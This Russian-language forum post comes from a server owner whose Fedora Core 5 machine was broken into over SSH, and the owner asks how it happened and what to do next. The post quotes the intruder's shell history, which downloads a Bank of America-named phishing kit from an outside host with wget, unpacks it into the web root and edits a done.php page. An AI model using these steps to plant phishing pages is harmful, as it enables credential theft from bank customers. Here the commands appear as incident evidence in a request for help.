Только что зашёл на свою машину через ssh и обнаружил, что последний сеанс был неизвестно откуда :-(
Вот последние выполненные команды (из history):
================================
982 cd /usr/include/
983 cat libssh.h
984 more libssh.h
985 cd /var/www
986 ls -all
987 cd html
988 ls
989 cat index.html
990 ftp
991 wget http://www.caldsl.com/~b1yamamoto/ww...ica.com.tar.gz
992 wget http://www.caldsl.com/~b1yamamoto/ww...ica.com.tar.gz
993 ftp
994 ls
995 tar zxvf www.bankofamerica.com.tar.gz
996 rm -rf
997 ls
998 cd http://www.bankofamerica.com/sslencr...nline_banking/
999 pico done.php
1000 nano done.php
================================
Первый вопрос: как? У меня нормальный пароль (10 случайных символов), сервисов никаких опасных вроде бы не запущено (но запущен iptables).
Правда я вчера запустил proftpd... Система конечно немного старовата -- FC5...
Второй вопрос: что делать?
С помощью этих команд, как я понял, мне залили фишинг страничку (её я уже удалил). Вопрос в том, что делать дальше?
Пароль сменил, proftpd остановил. Что ещё надо сделать?
Ответ на:
комментарий
от Giz0
Ответ на:
комментарий
от Giz0
Ответ на:
комментарий
от Kinjo
Ответ на:
комментарий
от j262
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Похожие темы
- Форум Память в bash течёт как из ведра при переборе элементов массива (2016)
- Форум логика работы __generic_file_aio_read ??? (2005)
- Форум Меня взломали. Что делать... (2009)
- Форум Что делать если взломали? (2001)
- Форум Взломали сервер FC7, что делать? (2009)
- Форум Взломали? (2006)
- Форум Compiz Plugins (2007)
- Форум Взломали сервер (2016)
- Форум Адоб взломали (2013)
- Форум Взломали почту (2012)